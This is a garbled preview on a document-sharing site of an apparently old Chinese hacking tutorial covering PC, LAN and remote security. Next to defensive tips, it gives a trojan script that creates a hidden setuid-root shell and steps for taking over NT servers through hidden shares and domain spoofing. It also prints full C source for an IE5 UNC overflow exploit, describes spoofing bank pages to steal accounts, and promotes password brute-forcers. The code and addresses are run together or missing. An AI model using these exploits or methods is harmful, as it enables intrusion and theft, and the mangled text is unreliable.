網(wǎng)絡(luò)攻防基礎(chǔ)教程_第1頁
網(wǎng)絡(luò)攻防基礎(chǔ)教程_第2頁
網(wǎng)絡(luò)攻防基礎(chǔ)教程_第3頁
網(wǎng)絡(luò)攻防基礎(chǔ)教程_第4頁
網(wǎng)絡(luò)攻防基礎(chǔ)教程_第5頁
已閱讀5頁,還剩6頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

網(wǎng)絡(luò)攻防的基礎(chǔ)教程制作:shaokejian單機(jī)安全你有一臺(tái)電腦,平時(shí)用來上上網(wǎng),玩玩游戲,偶爾也敲點(diǎn)公文進(jìn)去,你認(rèn)為它挺安全的,但有一天,你的朋友突然告訴你,他有你的上網(wǎng)帳號和密碼,你相信嗎?—不要不信,這種方法挺多的,假如你用的是WINDOWS,假如你撥號上網(wǎng)的密碼寫了保存,那任何人只要在你的電腦上運(yùn)行某個(gè)小軟件就……我從來不保存什么密碼—你可能要得意的說,但—你的朋友在你電腦里裝了一個(gè)木馬,可以捕捉撥號網(wǎng)絡(luò)那個(gè)“連接到”的Caption,然后記下你所按的鍵盤,悄悄地將文件寫入一個(gè)加密過的文本后再自動(dòng)退出—會(huì)點(diǎn)編程的人應(yīng)該都做得到,你的電腦是不是失守了?設(shè)了屏幕保護(hù)密碼—天啊,重啟動(dòng)后還有什么?設(shè)定了管理策略,用策略編輯器編輯過,如果不輸密碼他就進(jìn)不了,進(jìn)去了也什么都干不成!—把你的user.dat和system.dat刪掉后用我的代替,這個(gè)主意你認(rèn)為怎么樣?當(dāng)然我不是讓你杯弓蛇影弄得一個(gè)朋友都沒有只能形影相吊――這樣活著太沒勁啦!如果你的電腦沒有機(jī)密資訊的話當(dāng)然無所謂,如果有—保證盡量少的人接觸它!寫了這么多都是WIN9X的,UNIX系統(tǒng)里這方面的問題是不是就少了呢?從物理方面來說,如果一臺(tái)機(jī)器擺放的位置不安全,能讓人有足夠的時(shí)間打開機(jī)箱做一些手腳,你的機(jī)器就無法安全,就拿我的機(jī)子來說吧,我有兩塊硬盤,但在WIN9X和NT里都看不到第二塊硬盤的影子—我把它裝上了LINUX,而且只能從一個(gè)特定的地方啟動(dòng)它,啟動(dòng)之后,在LINUX下,我可以任意的用mount命令裝其它操作系統(tǒng)里的所有數(shù)據(jù)一掃而空局域網(wǎng)安全基于同樣的道理,局域網(wǎng)中的電腦在物理上仍然要嚴(yán)加控制,同時(shí)還要經(jīng)常性地注意局域網(wǎng)中用戶的—些非正常的舉動(dòng)一為什么?這還用問,就拿我身邊的例子來說吧,我有個(gè)朋友,公司里三十多臺(tái)電腦連成一個(gè)局域網(wǎng),但這家伙總想弄到主機(jī)的最高權(quán)限,于是乎監(jiān)聽SMB密文、安裝木馬忙得不亦樂乎—最后呢,當(dāng)然得手了,畢竟是我的哥們嘛:)還有,比如在UNIX中最好要限制ROOT只能由主控臺(tái)(console)登錄、要謹(jǐn)慎使用su命令等等,不然都會(huì)給同一網(wǎng)域內(nèi)的一群“虎視眈眈”想獲取最高權(quán)限者以機(jī)會(huì)……辟如說:shell環(huán)境變量PATH中包含用冒號分開的目錄名清單,shell按照清單中給定的順序搜索這些目錄,找出運(yùn)行的命令的可執(zhí)行文件,PATH變量的典型內(nèi)容如下:$echo$PATH.:/usr/local/bin:/bin:/usr/bin/:/usr/X11/bin但如果你是ROOT的話,無論如何要把PATH變量從當(dāng)前目錄開始搜索的設(shè)置去掉,不然請考慮下面的可能性:甲請你過去在他的終端上做某些管理員職能,你去了,su成ROOT,執(zhí)行用戶要求你做的系統(tǒng)命令后退出ROOT帳號—無懈可擊,旦如果用戶將在他的目錄下做了一個(gè)假的su程序......那么你是從當(dāng)前目錄也就是甲的目錄開始搜索的,天啊,你執(zhí)行的是一個(gè)根本不知情的程序,可能是用戶自己編寫的特洛伊程序,用以記錄你的密碼……根據(jù)上面的原理,你看看如果ROOT不去掉本地目錄的話,下面這段代碼可能有什么用處吧#!/bin/shcp/bin/sh./stuff/junk/.superdudechmod4555./stuff/junk/.superduderm-f$0exec/bin/ls${1+"$@"}然后%cd%chmod700.%touch./-f明白了嗎?這個(gè)ls建立了一個(gè)隱藏的setuidroot的shell的copy......遠(yuǎn)程安全與黑客常用方法1、針對個(gè)人用戶個(gè)人用戶在網(wǎng)上最常遇到的“侵略性”的行為不外乎以下幾種@垃圾郵件這是一個(gè)永恒但又無奈的話題,垃圾郵件包括了諸如一些賺錢、廣告之類的信件和惡意的人們通過郵件炸彈發(fā)來“成噸重”的信件,這不需要任何技巧,也最是無聊—我收到的此類信件多如牛毛呀!對付此類信件遠(yuǎn)程登陸刪除就行了,也沒有必要非查出該發(fā)信人的行蹤再施以報(bào)復(fù)—網(wǎng)上這種東西太多,可謂野火燒不盡……然后在信箱配置上設(shè)定拒收某些人、或者超大的信件就行了,這種垃圾不在我們的討論范圍之內(nèi)。@藍(lán)屏炸彈這是針對WIN95的OOB漏洞而開發(fā)出來的一些小軟件,多命名為*NUKE等等,以前是專門攻擊139端口,被攻擊的計(jì)算機(jī)多會(huì)出現(xiàn)”$著名的藍(lán)屏藍(lán)屏錯(cuò)誤,WIN98下此漏洞已經(jīng)PATCH上,所以大多數(shù)NUKE軟件都已失效了,但最近聽說一個(gè)叫VOOB的軟件對WIN98仍然有效—我還沒試過呢,要不要拿你開刀?該軟件界面如下:(此類軟件界面大抵如此,使用簡單無比)要防范此類軟件的攻擊,一個(gè)土辦法就是監(jiān)聽端口,網(wǎng)上有許多監(jiān)聽端口的軟件,你只要設(shè)定好監(jiān)聽的PORT,一旦有人企圖向這個(gè)端口發(fā)送信息包就會(huì)被記錄下來,然后人&%人&*,抓到他后,你自己看著辦吧……@共享文件這個(gè)問題網(wǎng)絡(luò)里有相當(dāng)多的安全人士已經(jīng)提過無數(shù)次了,但……我每次掃描一個(gè)C類地址群的時(shí)候都能發(fā)現(xiàn)一大群人依舊開著共享沒有任何防護(hù)而且自得其樂,很抱歉,我看過其中一些人的信、圖片甚至更加機(jī)密的……你的電腦里是不是有這樣的托著磁盤的小手呢?有的話可要小心了,你開著共享呢,也就是說,下面的方法對你來說相當(dāng)有效……1、本地攻擊c$、d$、admin$和print$這些共享是很危險(xiǎn)的?但是出于某些原因不愿意詳細(xì)提及危險(xiǎn)在何處.眾所周知,NT安裝以后,將每個(gè)磁盤自動(dòng)分配一個(gè)共享,c$,d$和。$等?這些共享是隱藏的共享,在網(wǎng)上鄰居是看不到它們的?另外還有admin$,ipc$,打印機(jī)共享后,還會(huì)生成print$這個(gè)共享.微軟說這些共享是為管理而設(shè)置的,且最好不要?jiǎng)h除.實(shí)際上,這些c$共享資源都是可訪問的,只不過需要一點(diǎn)權(quán)限?而print$則一般任何人都可以訪問.缺省地,要訪問c$,需要backupoperator以上的權(quán)限,即需要文件的備份權(quán)限?假設(shè)你的NT域內(nèi)有—個(gè)帳號是benny,NT的ip是,他是Backupoperator,而你得到了這個(gè)帳號的密碼,那么,你就可以通過網(wǎng)絡(luò)訪問NT服務(wù)器的c盤,而不管c盤有沒有被共享.方法如下:在運(yùn)行命令中輸入:文件:///c$則一個(gè)包含c盤所有文件的窗口將會(huì)彈出來.或者netusez:文件:///c$則NTserver上的c:盤就被映射為本地的z:盤.缺省地,你對這些目錄將具有完全控制的權(quán)限,你可以用NT入侵升級版的方法,把getadmin的文件傳到c盤來取得Administrator權(quán)限.另外,對于file:///print$你不需要backupoperator的權(quán)限就能完全控制2、遠(yuǎn)程攻擊本地攻擊的這個(gè)技巧很多人都知道,下面來談?wù)勥h(yuǎn)程攻擊這個(gè)毛病是可以用來遠(yuǎn)程攻擊的!假設(shè)有一臺(tái)server是/一般人輸入file:///c$后會(huì)出現(xiàn)一個(gè)對話框,要你輸入密碼(但并不要你輸入密碼)其實(shí)這是一個(gè)幌子,maybe微軟的開發(fā)人員留了一個(gè)公用密碼,否則,哪有不需要ID就提示輸入密碼的?上面,我們提到,在局域網(wǎng)內(nèi),只要是backupoperator以上級別的人輸入這條命令,就不會(huì)有密碼輸入對話框出現(xiàn),而會(huì)直接彈出暴露c盤所有文件和目錄的窗口.如果你有Backupoperator以上的權(quán)限,用域欺騙的方法,可以遠(yuǎn)程訪問C盤,并且在缺省情況下受到你的完全控制!C盤文件被控制的風(fēng)險(xiǎn)就是系統(tǒng)完全被控制發(fā)現(xiàn)的步驟:如上所述,要打開file:///c$這個(gè)磁盤,就得在/的這個(gè)域內(nèi)登錄?但是通過TCP/IP如何在NT的Lan內(nèi)登錄?我產(chǎn)生了一個(gè)欺騙這個(gè)NT域的念頭,即,我在本地設(shè)置一個(gè)與/的域的名稱相同的主域控制器假設(shè)/的域的名稱叫xxx,貝我將自己本地主域控制器的域名也改成xxx,并且也設(shè)置一個(gè)benny的帳號和密碼.然后撥號上網(wǎng),再輸入file:///c$后C盤的目錄居然彈出來了,權(quán)限是完全控制,欺騙成功!以上的方法有個(gè)問題,如何得知對方的域的名稱?用這個(gè)命令:NBTstat-A/quack注:NBTstat是NT上一個(gè)能檢驗(yàn)從NetBIOS名到TCP/IP地址的轉(zhuǎn)換的實(shí)用工具,能檢查NetBIOS的當(dāng)前佳話狀態(tài),也可以把表項(xiàng)從LMHOSTS文件添加到NetBIOS名字高速緩存中,或者檢驗(yàn)注冊的NetBIOS名和分配給你的計(jì)算機(jī)的NetBIOS作用域,與NETSTAT不同的是它只處理NetBIOS連接,而NETSTAT處理你的系統(tǒng)與其它計(jì)算機(jī)的全部連接。當(dāng)然,用這篇Retina的文獻(xiàn)中提到的方法,也可以獲得其域的名稱.本文的基礎(chǔ)是要獲得BackupOperator的權(quán)限,結(jié)果是能獲取Administrator權(quán)限丄ocal/Remote者0有效.但是,\\\print$這個(gè)目錄是不需要什么權(quán)限的,任何人都能訪問.因?yàn)閹缀跛械腘T機(jī)器的c$g錄是打開的,而且就算有人把這個(gè)共享刪除了,機(jī)器重新啟動(dòng)后又會(huì)被自動(dòng)打開,所以這個(gè)安全問題是很嚴(yán)重的.關(guān)于域欺騙的問題,是微軟的安全漏洞無疑.在這里看到,本文還要用到其它的hack技巧如nbtstat和getadmin,成功入侵一臺(tái)NTserver是要用到很多知識(shí)的.看了之后是不是覺得心驚肉跳—你硬盤上的文件全在別人的掌握之中!這種感覺不太好吧,呵,所以如果不是必要的話呢,WIN98文件及打印共享的選項(xiàng)就不要開了,NT下最好對NetBIOS作個(gè)限制,要開的話—找個(gè)安全工具,比如LOCKDOWN2000,漢化后界面如下:該軟件用法相當(dāng)簡單,可以實(shí)時(shí)監(jiān)控他人同你的電腦的連接……試試你就知道了。還有些人可能會(huì)說—我是撥號上網(wǎng),動(dòng)態(tài)IP,就算共享又怎么樣?請問你有沒有用ICQ?ICQ不是有“隱身人”的作用嗎?有些人又不服了—唉,那你就開著吧,告訴我你的ICQ號......@木馬侵襲說到木馬很多人的第一反應(yīng)就是BO,不錯(cuò),BO的確是迄今為止水平最高的一個(gè)木馬程序了—對了,要解釋一下什么是木馬嗎?就是遠(yuǎn)程控制軟件啦!一個(gè)客戶端,一個(gè)服務(wù)器端,兩邊都裝好后在客戶端就可以訪問遠(yuǎn)程的服務(wù)器了,之所以稱其為木馬,是因?yàn)樗窃诜?wù)器端不知情的情況下被裝入的—就是說,你一不小心,就“對外開放”了。網(wǎng)上木馬程序很流行,其實(shí)說來也很簡單,大致都是修改注冊表或者INI文件加載一個(gè)文件提供服務(wù),這就手工都很容易檢測出木馬來。一,看增加的不明服務(wù)。二,因?yàn)槟抉R是作為服務(wù)一般要打開一個(gè)網(wǎng)絡(luò)通信端口,所以檢查增加的服務(wù)端口也很容易檢查出木馬程序來。其實(shí)完全可以稍微改動(dòng)操作系統(tǒng)內(nèi)核而作出一個(gè)很好的木馬來,這樣不用改動(dòng)注冊表也可以讓用戶很不容易發(fā)覺。(比如說將木馬做進(jìn)某個(gè)驅(qū)動(dòng)程序里面,就人&*%$,咱們勞苦大眾想手工檢測可就不容易了……)現(xiàn)在流行的一些木馬多將自身復(fù)制到某個(gè)文件夾下隱藏起來,但它要運(yùn)行就得自啟動(dòng),所以檢查注冊表HKEY_LOCAL_MACHINE\software\microsoft\windows\currentvision\run下面有沒有什么值得懷疑的對象就行了。如果對這些不熟悉的話,下載一個(gè)叫cleaner的軟件亦可解決許多木馬問題,剛才提到的LOCKDOWN2000也有清除木馬功能。@惡意代碼這可能在聊天室或者瀏覽頁面時(shí)發(fā)生,現(xiàn)在主要是用javascript寫成的代碼,其作用千奇百怪,舉個(gè)簡單的例子吧,比如眾所周知的聊天室攻擊手段:讓別人開無數(shù)個(gè)窗口,當(dāng)然你得把自己的Java關(guān)了。(不過現(xiàn)在的聊天室可沒那和好破壞了,你最好得先搞清楚某個(gè)較有代表性聊天室的ASP代碼,對它有一番了解之后,舉一反三,自行發(fā)揮了。另一方面是一些包含惡意代碼的HTML頁面,你有可能在瀏覽某個(gè)頁面的時(shí)候被人把硬盤格式化了人&人一好夸張哦!下面是—段利用Windows95/98UNC緩存溢出漏洞寫成的代碼ie5filex.c:#include#include#defineMAXBUF1000#defineRETADR53/*jmpesp(FFE4)codeisstoredinthisarea.Youmustchangethisaddressfornon-JapaneseWindows98*/#defineEIP0xbfb75a35unsignedcharexploit_code[200]={0x43,0x43,0x43,0x43,0x43,0x53,0x53,0x53,0xB8,0x2D,0x23,0xF5,0xBF,0x48,0x50,0xC3,0x00};main(intargc,char*argv[]){FILE*fp;unsignedintip;unsignedcharbuf[MAXBUF];if(argc<2){printf("usage%soutput_htmlfile\n",argv[0]);exit(1);}if((fp=fopen(argv[1],"wb"))==NULL)returnFALSE;fprintf(fp,"memset(buf,0x41,MAXBUF);ip=EIP;buf[RETADR-1]=0x7f;buf[RETADR]=ip&0xff;buf[RETADR+1]=(ip>>8)&0xff;buf[RETADR+2]=(ip>>16)&0xff;buf[RETADR+3]=(ip>>24)&0xff;memcpy(buf+80,exploit_code,strlen(exploit_code));buf[MAXBUF]=0;fprintf(fp,"%s/\">\n",buf);fprintf(fp,"10secondslater,thismachinewillbeshutdown.");fprintf(fp,"IfyouareusingIE5forJapaneseWindows98,");fprintf(fp,"maybe,theexploitcodewhichshutsdownyourmachinewillbeexecuted.");fprintf(fp,"\n");fclose(fp);printf("%screated.\n",argv[1]);returnFALSE;}在Windows95和Windows98的網(wǎng)絡(luò)代碼部分存在溢出漏洞。通過使用一個(gè)超長的文名,攻擊者可以讓用戶機(jī)器崩潰或執(zhí)行任意代碼。這個(gè)漏洞可以通過web頁或HTML郵件來加以利用,在用戶用瀏覽器打開此頁面或打開郵件時(shí)進(jìn)行攻擊。此檢驗(yàn)程序只在日文Windows98\IE4\IE5環(huán)境下測試。在VC下編譯后可以得到一個(gè)ie5filex.exe,直接在DOS下鍵入ie5filexa,它便會(huì)生成一個(gè)HTML文件,打開這個(gè)文件時(shí)會(huì)提示錯(cuò)誤并且關(guān)機(jī),怎么樣,有點(diǎn)味道吧!@病毒攻擊病毒是什么就不用我說了吧,它有幾個(gè)比較讓人頭疼的特點(diǎn),破壞、潛伏、自我復(fù)制……我對病毒了解得并不多,但建議大家開著一個(gè)實(shí)時(shí)監(jiān)控的軟件如NAV,而下載軟件時(shí)最好先掃描一下再行打開。當(dāng)然網(wǎng)絡(luò)上有些破壞者將病毒裹在信息包中,當(dāng)成一些好玩的東西發(fā)送給別人,對這些不請自來的可執(zhí)行文件、WORD&EXCEL文檔,最好先做掃描(我就曾見過有人將CIH裹在他自己寫的一個(gè)自動(dòng)生成情書的小程序里寄給別人,而且還會(huì)將系統(tǒng)的日期調(diào)整到四月十六號……)如果想對這方面多些了解,建議到以下幾個(gè)站點(diǎn)轉(zhuǎn)悠轉(zhuǎn)悠:@WEB欺騙最近臺(tái)灣發(fā)現(xiàn)一起通過WEB欺騙獲取受害人的銀行帳號的事件(應(yīng)該也是在九、十月份發(fā)生的吧),操作者將某銀行的頁面拷貝,然后將該銀行的URL改寫,于是瀏覽者便在假的銀行頁面上進(jìn)行—系列的數(shù)據(jù)操作—當(dāng)然一切都被記錄在入侵者的電腦里了,然后的事情不用我說大家應(yīng)該也知道了吧……這種事情你們可千萬不能干呀人&人攻擊的關(guān)鍵在于要將該銀行頁面上的所有URL都指向入侵者的機(jī)器。假設(shè)攻擊者的服務(wù)器在機(jī)器/上運(yùn)行,被侵入的銀行的URL是http://www.bank.tw/,那么攻擊者要在頁面上的所有URL前加上自己的URL如下:/http://www.bank.tw。當(dāng)然這種行為要在入侵過的機(jī)器上干,要不然很容易就會(huì)被人發(fā)現(xiàn)你的真實(shí)身份,那就遜了人&人2、針對網(wǎng)絡(luò)主機(jī)網(wǎng)絡(luò)主機(jī)最經(jīng)常遇到的就是非法進(jìn)入了――你得記住這是違反法律的噢!假定一個(gè)黑客要對某網(wǎng)站進(jìn)行攻擊行為,那么他將使用什么手段進(jìn)入呢……@口令攻擊口令可以說是一個(gè)系統(tǒng)的大門,大多數(shù)新手開始都是由強(qiáng)攻口令而走上黑客之路的。過去許多系統(tǒng)中都有所謂JOE帳戶,既用戶名與口令相同的用戶—現(xiàn)在相對少了,即便如此,還是有相當(dāng)多的弱口令,如僅在用戶名后簡單加個(gè)數(shù)字之類的,那么一些破解口令的程序可就大顯身手了。我推薦兩個(gè)出色的口令解譯器給大家:a、 小榕軟件之流光,可用于檢測POP、FTP口令,多線程檢測,而且有高效的用戶流服務(wù)器流模式,探測速度飛快,可以說是同類軟件中的佼佼者,小榕同時(shí)還有另一優(yōu)秀的軟件亂刀!,能破解取得的PASSWD文檔密文,速度甚至比JOHN還快得多,這兩個(gè)軟件應(yīng)該是大家工具箱中的寶貝,可以到他的主頁去下載使用—這兩個(gè)軟件是共享版,需要注冊—請支持黑客軟件!下面是它的運(yùn)行界面:b、 天行軟件之網(wǎng)絡(luò)刺客2Beta版,這個(gè)東東恐怕不需要我說了,三個(gè)字:全功能!雖然現(xiàn)在還沒有完工,但只要是寶劍,就算在鞘里依然是有其威風(fēng)的,它包括的功能……算了,你自己下載一個(gè)好好試試,反正絕不會(huì)后悔的。天行同時(shí)還有一個(gè)安全產(chǎn)品網(wǎng)絡(luò)衛(wèi)兵共享版發(fā)布。下面是網(wǎng)絡(luò)刺客的FTP強(qiáng)攻的界面:@掃描記得似乎是goodwell說過,好的掃描器千金難買,的確如此,其實(shí)掃描器就是將已知的系統(tǒng)漏洞寫入程序,運(yùn)行后它會(huì)搜索某一地址的站點(diǎn),如果該站存在某些已知的漏洞,則掃描器最后的報(bào)告中會(huì)告知你,那么一名黑客就可以嘗試以這些已知的漏洞去進(jìn)攻—有目標(biāo)了嘛!當(dāng)然有些可能已被PATCH上了,可有些則不然,成功與否就看你的功力與運(yùn)氣了。綠色兵團(tuán)zer9發(fā)表的WEBSecunityScanner是我所見掃描器中相當(dāng)出色的一個(gè),其中個(gè)人主頁掃描與IISHACK檢查因可能帶來危險(xiǎn),所以需要向作者索取KEY才能使用另一種掃描器是掃描端口的,這也是一種獲取主機(jī)信息的好方法。比如它能輕易得到運(yùn)行的操作系統(tǒng)信息以及提供了哪些服務(wù)。在UNIX下通常開放許多端口,如13(daytime)\19(chargen)......等等,而NT只提供一些通用服務(wù)如P0RT21,PORT80,同時(shí)還在135、139端口進(jìn)行監(jiān)聽,而WIN95則只在139進(jìn)行監(jiān)聽,這樣操作系統(tǒng)的判別是不是就非常容易了呢?下面這個(gè)東東就是干這種事的:@緩沖區(qū)溢出漏洞無論是系統(tǒng)提供的一些調(diào)用或是用戶編寫的程序,有時(shí)都可能缺乏對要拷貝的字符串長

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

最新文檔

評論

0/150

提交評論